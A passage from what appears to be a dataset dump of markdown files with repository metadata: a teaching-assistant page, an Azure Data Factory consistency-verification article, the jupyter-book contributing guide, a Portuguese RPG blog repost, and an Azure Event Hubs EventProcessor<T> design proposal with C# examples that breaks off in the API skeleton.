] | null | null | null | _teaching/2012-Spring-teaching.md | SumathyS/SumathyS.github.io | 5e4e0e1bf4dc02b47c305c63a339ba28a0c0bc60 | [
"MIT"
] | null | null | null | _teaching/2012-Spring-teaching.md | SumathyS/SumathyS.github.io | 5e4e0e1bf4dc02b47c305c63a339ba28a0c0bc60 | [
"MIT"
] | null | null | null | ---
title: "Graduate Teaching Assistant"
collection: teaching
type: "Graduate course Watershed Modeling / Advanced Watershed Modeling BAE 669/869"
permalink: /teaching/2012-Spring-teaching
venue: "Department of Biological and Agricultural Engineering, Kansas State University"
date: 2012-01-01
location: "Manhattan, USA"
---
Spring 2010-Spring 2012 Developed lab materials and conducted lab sections on STEPL model setup, application, BMP simulations and load reductions in undergraduate/graduate-level course in Watershed Modeling (BAE 669) and undergraduate-level course in Watershed Management (ATM 661).
| 46.923077 | 282 | 0.809836 | eng_Latn | 0.929775 |
fa670ccb6f0a9664a662f980efbe6e3fe683bef8 | 8,884 | md | Markdown | articles/data-factory/copy-activity-data-consistency.md | alanlima/azure-docs | f1132db5c8ad5a0f2193d751e341e1cd31989854 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/data-factory/copy-activity-data-consistency.md | alanlima/azure-docs | f1132db5c8ad5a0f2193d751e341e1cd31989854 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/data-factory/copy-activity-data-consistency.md | alanlima/azure-docs | f1132db5c8ad5a0f2193d751e341e1cd31989854 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-06-18T14:21:42.000Z | 2020-06-18T14:21:42.000Z | ---
title: Data consistency verification in copy activity
description: 'Learn about how to enable data consistency verification in copy activity in Azure Data Factory.'
services: data-factory
documentationcenter: ''
author: dearandyxu
manager:
ms.reviewer:
ms.service: data-factory
ms.workload: data-services
ms.topic: conceptual
ms.date: 3/27/2020
ms.author: yexu
---
# Data consistency verification in copy activity (Preview)
[!INCLUDE[appliesto-adf-asa-md](includes/appliesto-adf-asa-md.md)]
When you move data from source to destination store, Azure Data Factory copy activity provides an option for you to do additional data consistency verification to ensure the data is not only successfully copied from source to destination store, but also verified to be consistent between source and destination store. Once inconsistent data have been found during the data movement, you can either abort the copy activity or continue to copy the rest by enabling fault tolerance setting to skip inconsistent data. You can get the skipped object names by enabling session log setting in copy activity.
> [!IMPORTANT]
> This feature is currently in preview with the following limitations we are actively working on:
>- Data consistency verification is available only on binary files copying between file-based stores with 'PreserveHierarchy' behavior in copy activity. For copying tabular data, data consistency verification is not available in copy activity yet.
>- When you enable session log setting in copy activity to log the inconsistent files being skipped, the completeness of log file can not be 100% guaranteed if copy activity failed.
>- The session log contains inconsistent files only, where the successfully copied files are not logged so far.
## Supported data stores
### Source data stores
- [Azure Blob storage](connector-azure-blob-storage.md)
- [Azure Data Lake Storage Gen1](connector-azure-data-lake-store.md)
- [Azure Data Lake Storage Gen2](connector-azure-data-lake-storage.md)
- [Azure File Storage](connector-azure-file-storage.md)
- [Amazon S3](connector-amazon-simple-storage-service.md)
- [File System](connector-file-system.md)
- [HDFS](connector-hdfs.md)
### Destination data stores
- [Azure Blob storage](connector-azure-blob-storage.md)
- [Azure Data Lake Storage Gen1](connector-azure-data-lake-store.md)
- [Azure Data Lake Storage Gen2](connector-azure-data-lake-storage.md)
- [Azure File Storage](connector-azure-file-storage.md)
- [File System](connector-file-system.md)
## Configuration
The following example provides a JSON definition to enable data consistency verification in Copy Activity:
```json
"typeProperties": {
"source": {
"type": "BinarySource",
"storeSettings": {
"type": "AzureDataLakeStoreReadSettings",
"recursive": true
}
},
"sink": {
"type": "BinarySink",
"storeSettings": {
"type": "AzureDataLakeStoreWriteSettings"
}
},
"validateDataConsistency": true,
"skipErrorFile": {
"dataInconsistency": true
},
"logStorageSettings": {
"linkedServiceName": {
"referenceName": "ADLSGen2_storage",
"type": "LinkedServiceReference"
},
"path": "/sessionlog/"
}
}
```
Property | Description | Allowed values | Required
-------- | ----------- | -------------- | --------
validateDataConsistency | If you set true for this property, copy activity will check file size, lastModifiedDate, and MD5 checksum for each object copied from source to destination store to ensure the data consistency between source and destination store. Be aware the copy performance will be affected by enabling this option. | True<br/>False (default) | No
dataInconsistency | One of the key-value pairs within skipErrorFile property bag to determine if you want to skip the inconsistent data.<br/> -True: you want to copy the rest by skipping inconsistent data.<br/> - False: you want to abort the copy activity once inconsistent data found.<br/>Be aware this property is only valid when you set validateDataConsistency as True. | True<br/>False (default) | No
logStorageSettings | A group of properties that can be specified to enable session log to log skipped objects. | | No
linkedServiceName | The linked service of [Azure Blob Storage](connector-azure-blob-storage.md#linked-service-properties) or [Azure Data Lake Storage Gen2](connector-azure-data-lake-storage.md#linked-service-properties) to store the session log files. | The names of an `AzureBlobStorage` or `AzureBlobFS` types linked service, which refers to the instance that you use to store the log files. | No
path | The path of the log files. | Specify the path that you want to store the log files. If you do not provide a path, the service creates a container for you. | No
>[!NOTE]
>- Data consistency is not supported in staging copy scenario.
>- When copying binary files from any storage store to Azure Blob Storage or Azure Data Lake Storage Gen2, copy activity does file size and MD5 checksum verification to ensure the data consistency between source and destination stores.
>- When copying binary files from any storage store to any storage stores other than Azure Blob Storage or Azure Data Lake Storage Gen2, copy activity does file size verification to ensure the data consistency between source and destination store.
## Monitoring
### Output from copy activity
After the copy activity runs completely, you can see the result of data consistency verification from the output of each copy activity run:
```json
"output": {
"dataRead": 695,
"dataWritten": 186,
"filesRead": 3,
"filesWritten": 1,
"filesSkipped": 2,
"throughput": 297,
"logPath": "https://myblobstorage.blob.core.windows.net//myfolder/a84bf8d4-233f-4216-8cb5-45962831cd1b/",
"dataConsistencyVerification":
{
"VerificationResult": "Verified",
"InconsistentData": "Skipped"
}
}
```
You can see the details of data consistency verification from "dataConsistencyVerification property".
Value of **VerificationResult**:
- **Verified**: Your copied data has been verified to be consistent between source and destination store.
- **NotVerified**: Your copied data has not been verified to be consistent because you have not enabled the validateDataConsistency in copy activity.
- **Unsupported**: Your copied data has not been verified to be consistent because data consistency verification is not supported for this particular copy pair.
Value of **InconsistentData**:
- **Found**: ADF copy activity has found inconsistent data.
- **Skipped**: ADF copy activity has found and skipped inconsistent data.
- **None**: ADF copy activity has not found any inconsistent data. It can be either because your data has been verified to be consistent between source and destination store or because you disabled validateDataConsistency in copy activity.
### Session log from copy activity
If you configure to log the inconsistent file, you can find the log file from this path: `https://[your-blob-account].blob.core.windows.net/[path-if-configured]/copyactivity-logs/[copy-activity-name]/[copy-activity-run-id]/[auto-generated-GUID].csv`. The log files will be the csv files.
The schema of a log file is as following:
Column | Description
-------- | -----------
Timestamp | The timestamp when ADF skips the inconsistent files.
Level | The log level of this item. It will be in 'Warning' level for the item showing file skipping.
OperationName | ADF copy activity operational behavior on each file. It will be 'FileSkip' to specify the file to be skipped.
OperationItem | The file name to be skipped.
Message | More information to illustrate why files being skipped.
The example of a log file is as following:
```
Timestamp, Level, OperationName, OperationItem, Message
2020-02-26 06:22:56.3190846, Warning, FileSkip, "sample1.csv", "File is skipped after read 548000000 bytes: ErrorCode=DataConsistencySourceDataChanged,'Type=Microsoft.DataTransfer.Common.Shared.HybridDeliveryException,Message=Source file 'sample1.csv' is changed by other clients during the copy activity run.,Source=,'."
```
From the log file above, you can see sample1.csv has been skipped because it failed to be verified to be consistent between source and destination store. You can get more details about why sample1.csv becomes inconsistent is because it was being changed by other applications when ADF copy activity is copying at the same time.
## Next steps
See the other Copy Activity articles:
- [Copy activity overview](copy-activity-overview.md)
- [Copy activity fault tolerance](copy-activity-fault-tolerance.md)
| 54.839506 | 601 | 0.740545 | eng_Latn | 0.985294 |
fa672d2064d5a6c771e5d00e12b8c5fde01500b6 | 9,255 | md | Markdown | CONTRIBUTING.md | fmaussion/jupyter-book | 4fe6493412d5c76a39b1a3e7455dc9e640f5f333 | [
"BSD-3-Clause"
] | 1 | 2020-07-10T22:19:18.000Z | 2020-07-10T22:19:18.000Z | CONTRIBUTING.md | annefou/jupyter-book | 67b280fd9ab87e443b8347200deda6dae7f0553a | [
"BSD-3-Clause"
] | null | null | null | CONTRIBUTING.md | annefou/jupyter-book | 67b280fd9ab87e443b8347200deda6dae7f0553a | [
"BSD-3-Clause"
] | null | null | null | # Contributing to `jupyter-book`
Welcome to the `jupyter-book` repository! We're excited you're here and want to contribute.
These guidelines are designed to make it as easy as possible to get involved.
If you have any questions that aren't discussed below, please let us know by opening an [issue][link_issues]!
Before you start you'll need to set up a free [GitHub][link_github] account and sign in.
Here are some [instructions][link_signupinstructions].
Already know what you're looking for in this guide? Jump to the following sections:
* [Joining the conversation](#joining-the-conversation)
* [Contributing through Github](#contributing-through-github)
* [Understanding issues, milestones, and project boards](#understanding-issues-milestones-and-project-boards)
* [Making a change](#making-a-change)
* [Structuring contributions](#style-guide)
* [Recognizing contributors](#recognizing-contributions)
## Joining the conversation
`jupyter-book` is a young project maintained by a growing group of enthusiastic developers— and we're excited to have you join!
Most of our discussions will take place on open [issues][link_issues].
As a reminder, we expect all contributors to `jupyter-book` to adhere to the [Jupyter Code of Conduct][link_coc] in these conversations.
## Contributing through GitHub
[git][link_git] is a really useful tool for version control.
[GitHub][link_github] sits on top of git and supports collaborative and distributed working.
You'll use [Markdown][markdown] to chat in issues and pull requests on GitHub.
You can think of Markdown as a few little symbols around your text that will allow GitHub
to render the text with formatting.
For example you could write words as bold (`**bold**`), or in italics (`*italics*`),
or as a [link][rick_roll] (`[link](https://https://youtu.be/dQw4w9WgXcQ)`) to another webpage.
GitHub has a helpful page on
[getting started with writing and formatting Markdown on GitHub][writing_formatting_github].
## Understanding issues, milestones and project boards
Every project on GitHub uses [issues][link_issues] slightly differently.
The following outlines how the `jupyter-book` developers think about these tools.
**Issues** are individual pieces of work that need to be completed to move the project forwards.
A general guideline: if you find yourself tempted to write a great big issue that
is difficult to describe as one unit of work, please consider splitting it into two or more issues.
Issues are assigned [labels](#issue-labels) which explain how they relate to the overall project's
goals and immediate next steps.
### Issue labels
The current list of labels are [here][link_labels] and include:
* [][link_helpwanted] *These issues contain a task that a member of the team has determined we need additional help with.*
If you feel that you can contribute to one of these issues, we especially encourage you to do so!
* [][link_helpwanted] *These issues contain a task that a member of the team thinks could be a good entry point to the project.*
If you're new to the `jupyter-book` project, we think that this is a great place for your first contribution!
* [][link_bugs] *These issues point to problems in the project.*
If you find new a bug, please give as much detail as possible in your issue, including steps to recreate the error.
If you experience the same bug as one already listed, please add any additional information that you have as a comment.
* [][link_enhancement] *These issues are asking for enhancements to be added to the project.*
Please try to make sure that your enhancement is distinct from any others that have already been requested or implemented.
If you find one that's similar but there are subtle differences please reference the other request in your issue.
* [][link_question] *These are questions that users and contributors have asked.*
Please check the issues (especially closed ones) to see if your question has been asked and answered before.
If you find one that's similar but there are subtle differences please reference the other request in your issue.
## Making a change
We appreciate all contributions to `jupyter-book`, but those accepted fastest will follow a workflow similar to the following:
**1. Comment on an existing issue or open a new issue referencing your addition.**
This allows other members of the jupyter-book development team to confirm that you aren't overlapping with work that's currently underway and that everyone is on the same page with the goal of the work you're going to carry out.
[This blog][link_pushpullblog] is a nice explanation of why putting this work in up front is so useful to everyone involved.
**2. [Fork][link_fork] the [jupyter-book repository][link_jupyter-book] to your profile.**
This is now your own unique copy of jupyter-book.
Changes here won't effect anyone else's work, so it's a safe space to explore edits to the code!
Make sure to [keep your fork up to date][link_updateupstreamwiki] with the master repository.
**3. Make the changes you've discussed.**
Try to keep the changes focused.
We've found that working on a [new branch][link_branches] makes it easier to keep your changes targeted.
**4. Submit a [pull request][link_pullrequest].**
A member of the development team will review your changes to confirm that they can be merged into the main code base.
When opening the pull request, we ask that you follow some [specific conventions](#pull-requests).
We outline these below.
### Pull Requests
To improve understanding pull requests "at a glance", we encourage the use of several standardized tags.
When opening a pull request, please use at least one of the following prefixes:
* **[BRK]** for changes which break existing builds or tests
* **[DOC]** for new or updated documentation
* **[ENH]** for enhancements
* **[FIX]** for bug fixes
* **[REF]** for refactoring existing code
* **[STY]** for stylistic changes
* **[TST]** for new or updated tests, and
You can also combine the tags above, for example if you are updating both a test and
the documentation: **[TST, DOC]**.
Pull requests should be submitted early and often!
If your pull request is not yet ready to be merged, please open your pull request as a draft.
More information about doing this is [available in GitHub's documentation][link_drafts].
This tells the development team that your pull request is a "work-in-progress",
and that you plan to continue working on it.
When your pull request is Ready for Review, you can select this option on the PR's page,
and a project maintainer will review your proposed changes.
## Recognizing contributors
We welcome and recognize all contributions from documentation to testing to code development.
You can see a list of current contributors in the [contributors tab][link_contributors].
## Thank you!
You're awesome. :wave::smiley:
<br>
*— Based on contributing guidelines from the [STEMMRoleModels][link_stemmrolemodels] project.*
[link_git]: https://git-scm.com
[link_github]: https://github.com/https://github.com/jupyter/governance/blob/master/conduct/code_of_conduct.md
[link_jupyter-book]: https://github.com/jupyter/jupyter-book
[link_signupinstructions]: https://help.github.com/articles/signing-up-for-a-new-github-account
[writing_formatting_github]: https://help.github.com/articles/getting-started-with-writing-and-formatting-on-github
[markdown]: https://daringfireball.net/projects/markdown
[rick_roll]: https://www.youtube.com/watch?v=dQw4w9WgXcQ
[restructuredtext]: http://docutils.sourceforge.net/rst.html#user-documentation
[sphinx]: http://www.sphinx-doc.org/en/master/index.html
[readthedocs]: https://docs.readthedocs.io/en/latest/index.html
[link_issues]: https://github.com/jupyter/jupyter-book/issues
[link_coc]: https://github.com/jupyter/governance/blob/master/conduct/code_of_conduct.md
[link_labels]: https://github.com/jupyter/jupyter-book/labels
[link_bugs]: https://github.com/jupyter/jupyter-book/labels/bug
[link_helpwanted]: https://github.com/jupyter/jupyter-book/labels/help%20wanted
[link_enhancement]: https://github.com/jupyter/jupyter-book/labels/enhancement
[link_question]: https://github.com/jupyter/jupyter-book/labels/question
[link_pullrequest]: https://help.github.com/articles/creating-a-pull-request/
[link_fork]: https://help.github.com/articles/fork-a-repo/
[link_pushpullblog]: https://www.igvita.com/2011/12/19/dont-push-your-pull-requests/
[link_updateupstreamwiki]: https://help.github.com/articles/syncing-a-fork/
[link_branches]: https://help.github.com/articles/creating-and-deleting-branches-within-your-repository/
[link_drafts]: https://help.github.com/articles/about-pull-requests/#draft-pull-requests
[link_contributors]: https://github.com/jupyter/jupyter-book/graphs/contributors
[link_stemmrolemodels]: https://github.com/KirstieJane/STEMMRoleModels
| 50.851648 | 228 | 0.776985 | eng_Latn | 0.991169 |
fa67a90f33afe24095d45e17e153a0607242e152 | 1,044 | md | Markdown | _posts/2009-02-13-compacto.md | cacilhas/hondaj | 0bf732ea848949e8bdf669933def546ae3b1e08c | [
"CC-BY-4.0"
] | null | null | null | _posts/2009-02-13-compacto.md | cacilhas/hondaj | 0bf732ea848949e8bdf669933def546ae3b1e08c | [
"CC-BY-4.0"
] | 1 | 2020-04-23T04:05:30.000Z | 2020-04-23T04:05:30.000Z | _posts/2009-02-13-compacto.md | cacilhas/hondaj | 0bf732ea848949e8bdf669933def546ae3b1e08c | [
"CC-BY-4.0"
] | null | null | null | ---
layout: post
title: COMPACTO
date: 2009-02-13 12:00:00 -0300
tags: off-topic repost
permalink: /2009/02/compacto
---
Muita coisa no [{{ site.title }}](//hondaj.cacilhas.info/) foi inspirada no
[COMPACTO](http://claudiotorcato.wordpress.com/2009/02/13/sistema-de-rpg-compacto/),
portanto acho importante divulgar esse sistema.
Criado por [Claudio Torcato](http://claudiotorcato.wordpress.com/), COMPACTO é
um sistema pequeno e genérico com ênfase na simplicidade, velocidade de jogo e
interpretação.
Torcato acabou de republicar o sistema em:
<div class="text-center">
<a href="http://claudiotorcato.wordpress.com/2009/02/13/sistema-de-rpg-compacto/">
Sistema de RPG: Compacto
</a><br/>
<a href="http://claudiotorcato.wordpress.com/2009/02/13/nave-negra/">
Nave Negra
</a>
</div>
--------------------------------------------------------------------------------
<div class="text-right">
<small>
<a href="http://khondaj.blogspot.com/2009/02/compacto.html">
Publicação original
</a>
</small>
</div>
| 28.216216 | 84 | 0.655172 | por_Latn | 0.66342 |
fa6815d8438be5ddd2c3317dc808d036837e0797 | 25,275 | md | Markdown | sdk/eventhub/Azure.Messaging.EventHubs/design/event-processor{T}-proposal.md | gtxistxgao/azure-sdk-for-net | 637d0db0c3b3fe7e1716dac107408250ec4e9c32 | [
"MIT"
] | null | null | null | sdk/eventhub/Azure.Messaging.EventHubs/design/event-processor{T}-proposal.md | gtxistxgao/azure-sdk-for-net | 637d0db0c3b3fe7e1716dac107408250ec4e9c32 | [
"MIT"
] | null | null | null | sdk/eventhub/Azure.Messaging.EventHubs/design/event-processor{T}-proposal.md | gtxistxgao/azure-sdk-for-net | 637d0db0c3b3fe7e1716dac107408250ec4e9c32 | [
"MIT"
] | null | null | null | # .NET Event Hubs Client: Event Processor<T> Proposal
The Event Hubs client library offers two primary clients for consuming events, the `EventHubConsumerClient` and `EventProcessorClient`, each designed for slightly different scenarios but unified in their approach to provide a consistent experience for developers starting with the "Hello World" experience and stepping-up to production use. These clients embrace a common design philosophy in providing developers an experience optimized around ease of use, familiar patterns, and a consistent API across them.
The `EventProcessorClient` is an opinionated implementation offering a familiar paradigm built on the .NET event handler pattern and striving for consistency with the iterator-based consumption model used by the `EventHubConsumerClient`. In order to offer API consistency and minimize complexity, it works at a high level of abstraction with separation between its API and the low-level service operations. The `EventProcessorClient` is fairly rigid, providing a development experience "on rails" with minimal opportunity to customize or opt-into the additional complexity for a "closer to the metal" experience.
## Things to know before reading
- The names used in this document are intended for illustration only. Some names are not ideal and may not fully conform to guidelines; these will be refined during discussion and board reviews.
- Some details not related to the high-level concept are not illustrated; the scope of this is limited to the high level shape and paradigms for the feature area.
- Fake methods are used to illustrate "something needs to happen, but the details are unimportant." As a general rule, if an operation is not directly related to one of the Event Hubs types, it can likely be assumed that it is for illustration only. These methods will most often use ellipses for the parameter list, in order to help differentiate them.
## Target segment: Developers with specialized needs
These are developers working on products which have special needs that are often specialized and do not fit into the majority case for many Event Hubs client library users. While this segment has a much smaller addressable market, those that fall into this segment often drive a large amount of ACR.
These developers are interested in using the low-level components of the Event Hubs client library, focused around client-service communication that they can control and customize to meet their needs. This class of developers are considered advanced users of Event Hubs with a deep understanding of the service, cloud development, and messaging systems. Many are willing to accept the complexity of working with lower-level components for the ability to have more control for their implementation.
## Why this is needed
The current `EventProcessorClient` implementation is opinionated and focused on providing a step-up experience for developers used to consuming events from the `EventHubConsumerClient` and its iterator pattern. In order to reduce complexity, each `EventProcessorClient` is also bound to a specific storage provider whose dependencies are bundled with the processor's package.
To meet its goals `EventProcessorClient` chose to limit flexibility and make use of higher-level patterns to reduce complexity, simplify use, and offer an experience familiar to `EventHubConsumerClient` users. As a result, it does not address advanced scenarios requiring higher throughput nor where customization is desired.
## Design goals
- Allow developers to create a custom `EventProcessor` by implementing and overriding a base class. The base should require minimal ceremony and allow for method overrides for functionality rather than making use of higher-level patterns such as event handlers.
- The base class should handle the low-level implementation details, such as ensuring resiliency when reading events and performing collaborative load balancing with other processors working against the same Event Hub and consumer group.
- Work natively with event batches, utilizing the low-level partition receiver to achieve the highest possible throughput and avoid the local caching used by the `EventHubConsumerClient` when surfacing events via its iterators.
- Allow tuning of low-level options for reading events, so that developers can maximize efficiency and throughput for their specific application scenarios.
- Provide a neutral interface for storage operations, allowing developers to utilize whatever underlying storage they prefer, taking responsibility for the persistence of state.
## Key types
### Event Processor<TPartition>
An abstract set of base functionality as a starting point for extension. Base functionality includes cooperative load balancing, resiliency for service operations, and infrastructure for event processing and error handling.
- Processes events in batches, rather than single events.
- Guarantees that only one event-batch-per-partition is dispatched for processing at one time and manages concurrency to allow multiple partitions to be processing at once.
- Does not impose the higher-level abstractions of the opinionated client; operations are performed by overriding/implementing base class methods rather than using an event-based model. The arguments for these methods are built around the set of lower-level types and do not make use of the `EventArg` abstractions.
- Allows for a custom set of information to be tracked and flow through the infrastructure for custom context associated with a specific partition.
### Event Processor Options
In addition to the standard connection and retry options, allows configuration of lower-level details such as the batch size and prefetch count for optimal tuning.
### Event Processor Partition
Represents the base for custom partition context types used within the procesor to represent the active partition context for a given operation.
### Event Processor Checkpoint
The representation of the last event seen by a processor for a given Event Hub, consumer group, and partition combination. This is intended to be a durable representation of state, allowing processing to resume from the next event should partition ownership change or processing restart.
### Partition Ownership
Denotes that a specific Event Processor owns the responsibility of processing the partition for a given Event Hub and consumer group. Ownership may change as processing work is balanced among active processors for the Event Hub and consumer group combination.
## Usage examples
### Create a minimal custom processor
```csharp
public class CustomProcessor : EventProcessor<EventProcessorPartition>
{
// Local event processing
protected override async Task OnProcessingEventBatchAsync(IEnumerable<EventData> events, EventProcessorPartition partition, CancellationToken cancellationToken = default)
{
await DoSomethingWithEvents(events).ConfigureAwait(false);
Log.Information($"Received event batch for partition: { partition.PartitionId }");
}
protected override Task OnProcessingErrorAsync(Exception exception, EventProcessorPartition partition, string operationDescription, CancellationToken cancellationToken = default)
{
Log.Error(exception, $"Error occured for partition: { partition.PartitionId } during { operationDescription }.");
return Task.CompletedTask;
}
// Storage integration
protected override Task<IEnumerable<EventProcessorCheckpoint>> ListCheckpointsAsync(CancellationToken cancellationToken) =>
CustomStorage.GetCheckpointsAsync(FullyQualifiedNamespace, EventHubName, ConsumerGroup);
protected override Task<IEnumerable<EventProcessorPartitionOwnership>> ListOwnershipAsync(CancellationToken cancellationToken) =>
CustomStorage.GetOwnershipAsync(FullyQualifiedNamespace, EventHubName, ConsumerGroup, Identifier);
protected override Task<IEnumerable<EventProcessorPartitionOwnership>> ClaimOwnershipAsync(IEnumerable<EventProcessorPartitionOwnership> desiredOwnership, CancellationToken cancellationToken) =>
CustomStorage.TryUpdateOwnershipAsync(desiredOwnership);
}
```
### Create a custom processor with custom partition context
```csharp
public class CustomPartition : EventProcessorPartition
{
public int ClientSecret { get; }
}
public class CustomProcessor : EventProcessor<CustomPartition>
{
// Initialize processing for the partition, including creating its context.
protected override Task OnPartitionInitializingAsync(CustomPartition partition, CancellationToken cancellationToken)
{
partition.ClientSecret = partition.PartitionId.GetHashCode();
return Task.CompletedTask;
}
// Local event processing
protected override async Task OnProcessingEventBatchAsync(IEnumerable<EventData> events, CustomPartition partition, CancellationToken cancellationToken = default)
{
await DoSomethingWithEvents(events).ConfigureAwait(false);
Log.Information($"Received event batch for partition: { partition.PartitionId }");
}
protected override Task OnProcessingErrorAsync(Exception exception, CustomPartition partition, string operationDescription, CancellationToken cancellationToken = default)
{
Log.Error(exception, $"Error occured for partition: { partition.PartitionId } during { operationDescription }.");
return Task.CompletedTask;
}
// Storage integration
protected override Task<IEnumerable<EventProcessorCheckpoint>> ListCheckpointsAsync(CancellationToken cancellationToken) =>
CustomStorage.GetCheckpointsAsync(FullyQualifiedNamespace, EventHubName, ConsumerGroup);
protected override Task<IEnumerable<EventProcessorPartitionOwnership>> ListOwnershipAsync(CancellationToken cancellationToken) =>
CustomStorage.GetOwnershipAsync(FullyQualifiedNamespace, EventHubName, ConsumerGroup, Identifier);
protected override Task<IEnumerable<EventProcessorPartitionOwnership>> ClaimOwnershipAsync(IEnumerable<EventProcessorPartitionOwnership> desiredOwnership, CancellationToken cancellationToken) =>
CustomStorage.TryUpdateOwnershipAsync(desiredOwnership);
}
```
### Create a processor and perform basic event processing
```csharp
public class CustomProcessor : EventProcessor<EventProcessorPartition>
{
// ... implementation
}
// Create the processor
var processor = new CustomProcessor(
100,
EventHubConsumerClient.DefaultConsumerGroupName,
"somenamespace.thing.servicebus.net",
"myAwesomeHub",
new DefaultAzureCredential());
// Processing for events and errors is defined as part
// of the custom processor class. There are no handlers
// to hook up here.
await processor.StartProcessingEventsAsync();
// Developer code can continue to perform actions;
// processing is taking place in the background.
using var cancellationSource = new TokenCancellationSource();
cancellationSource.CancelAfter(Timespan.FromMinutes(5));
try
{
await Task.Delay(Timeout.Infinite, cancellationSource.Token);
}
catch (TaskCanceledException)
{
// Expected; no action is necessary.
}
await processor.StopProcessingAsync();
```
### Create a processor with custom options
```csharp
public class CustomProcessor : EventProcessor<EventProcessorPartition>
{
// ... implementation
}
var options = new EventProcessorOptions
{
Identifier = "RedFive",
PrefetchCount = 300,
TrackLastEnqueuedEventProperties = true
};
// Specify the default starting position when no checkpoint was found.
//
// Overriding the default starting position for specific partitions can be achieved by
// returning the desired location when ListCheckpointsAsync is called.
options.DefaultStartingPosition = EventPosition.Latest;
// Create the processor
var processor = new CustomProcessor(
100,
EventHubConsumerClient.DefaultConsumerGroupName,
"somenamespace.thing.servicebus.net",
"myAwesomeHub",
new DefaultAzureCredential(),
options);
```
### Create a minimal custom processor with in-memory storage
```csharp
public class CustomProcessor : EventProcessor<EventProcessorPartition>
{
private InMemoryStorage Storage { get; } = new InMemoryStorage();
// Local event processing
protected override async Task OnProcessingEventBatchAsync(IEnumerable<EventData> events, EventProcessorPartition partition, CancellationToken cancellationToken = default)
{
var checkpointEvent = events.Last();
await DoSomethingWithEvents(events).ConfigureAwait(false);
await Storage.CreateCheckpointAsync(FullyQualifiedNamespace, EventHubName, ConsumerGroup, partition.PartitionId, checkpointEvent.Offset, checkpointEvent.SequenceNumber).ConfigureAwait(false);
Log.Information($"Received event batch for partition: { partition.PartitionId }");
}
protected override Task OnProcessingErrorAsync(Exception exception, EventProcessorPartition partition, string operationDescription, CancellationToken cancellationToken = default)
{
Log.Error(exception, $"Error occured for partition: { partition.PartitionId } during { operationDescription }.");
return Task.CompletedTask;
}
// Storage integration
protected override Task<IEnumerable<EventProcessorCheckpoint>> ListCheckpointsAsync(CancellationToken cancellationToken) =>
Storage.GetCheckpointsAsync(FullyQualifiedNamespace, EventHubName, ConsumerGroup);
protected override Task<IEnumerable<EventProcessorPartitionOwnership>> ListOwnershipAsync(CancellationToken cancellationToken) =>
Storage.GetOwnershipAsync(FullyQualifiedNamespace, EventHubName, ConsumerGroup, Identifier);
protected override Task<IEnumerable<EventProcessorPartitionOwnership>> ClaimOwnershipAsync(IEnumerable<EventProcessorPartitionOwnership> desiredOwnership, CancellationToken cancellationToken) =>
Storage.TryClaimOwnershipAsync(desiredOwnership);
}
public class InMemoryStorage
{
private ConcurrentDictionary<string, ConcurrentDictionary<string, EventProcessorCheckpoint>> Checkpoints { get; } = new ConcurrentDictionary<string, ConcurrentDictionary<string, EventProcessorCheckpoint>>();
private ConcurrentDictionary<string, ConcurrentDictionary<string, EventProcessorPartitionOwnership>> Ownership { get; } = new ConcurrentDictionary<string, ConcurrentDictionary<string, EventProcessorPartitionOwnership>>();
public Task CreateCheckpointAsync(
string fullyQualifiedNamespace,
string eventHubName,
string consumerGroup,
string partitionId,
long? offset,
long? sequenceNumber)
{
var key = CreateKey(fullyQualifiedNamespace, eventHubName, consumerGroup);
var checkpoints = Checkpoints.GetOrAdd(key, newKey => new ConcurrentDictionary<string, EventProcessorCheckpoint>());
var partitionCheckpoint = checkpoints.GetOrAdd(partitionId, new EventProcessorCheckpoint
{
FullyQualifiedNamespace = fullyQualifiedNamespace,
EventHubName = eventHubName,
ConsumerGroup = consumerGroup,
PartitionId = partitionId
});
if (offset.HasValue)
{
partitionCheckpoint.StartingPosition = EventPosition.FromOffset(offset.Value, false);
}
else
{
partitionCheckpoint.StartingPosition = EventPosition.FromSequenceNumber(sequenceNumber.Value, false);
}
return Task.CompletedTask;
}
public Task<IEnumerable<EventProcessorCheckpoint>> GetCheckpointsAsync(
string fullyQualifiedNamespace,
string eventHubName,
string consumerGroup)
{
var key = CreateKey(fullyQualifiedNamespace, eventHubName, consumerGroup);
var checkpoints = Checkpoints.GetOrAdd(key, newKey => new ConcurrentDictionary<string, EventProcessorCheckpoint>());
return Task.FromResult((IEnumerable<EventProcessorCheckpoint>)checkpoints.Values);
}
public Task<IEnumerable<EventProcessorPartitionOwnership>> GetOwnershipAsync(
string fullyQualifiedNamespace,
string eventHubName,
string consumerGroup)
{
var key = CreateKey(fullyQualifiedNamespace, eventHubName, consumerGroup);
var ownership = Ownership.GetOrAdd(key, newKey => new ConcurrentDictionary<string, EventProcessorPartitionOwnership>());
return Task.FromResult(ownership.Values.Where(item => item.OwnerIdentifier != identifier));
}
public Task<IEnumerable<EventProcessorPartitionOwnership>> TryClaimOwnershipAsync(
IEnumerable<EventProcessorPartitionOwnership> desiredOwnership)
{
if (desiredOwnership == null)
{
return Task.FromResult(Enumerable.Empty<EventProcessorPartitionOwnership>());
}
var claimedOwnership = new List<EventProcessorPartitionOwnership>();
foreach (var claim in desiredOwnership)
{
var key = CreateKey(claim.FullyQualifiedNamespace, claim.EventHubName, claim.ConsumerGroup);
var claimedPartitions = Ownership.GetOrAdd(key, newKey => new ConcurrentDictionary<string, EventProcessorPartitionOwnership>());
var nextVersion = new Version(Guid.NewGuid().ToString());
var ownership = claimedPartitions.AddOrUpdate(claim.PartitionId,
partitionId => new EventProcessorPartitionOwnership
(
claim.FullyQualifiedNamespace,
claim.EventHubName,
claim.ConsumerGroup,
claim.OwnerIdentifier,
claim.PartitionId,
claim.LastModifiedTime,
nextVersion
),
(partitionId, existingOwnership) =>
{
if (!string.Equals(existingOwnership.Version, claim.Version, StringComparison.OrdinalIgnoreCase))
{
return existingOwnership;
}
return new EventProcessorPartitionOwnership
(
claim.FullyQualifiedNamespace,
claim.EventHubName,
claim.ConsumerGroup,
claim.OwnerIdentifier,
claim.PartitionId,
claim.LastModifiedTime,
nextVersion
);
}
);
if (ownership.Version == nextVersion)
{
claimedOwnership.Add(ownership);
}
}
return Task.FromResult((IEnumerable<EventProcessorPartitionOwnership>)claimedOwnership);
}
private string CreateKey(
string fullyQualifiedNamespace,
string eventHubName,
string consumerGroup) => $"{ fullyQualifiedNamespace }/{ eventHubName }/{ consumerGroup }";
}
```
## API skeleton
### `Azure.Messaging.EventHubs.Primitives`
```csharp
public abstract class EventProcessor<TPartition> where TPartition : EventProcessorPartition, new()
{
public string FullyQualifiedNamespace { get; }
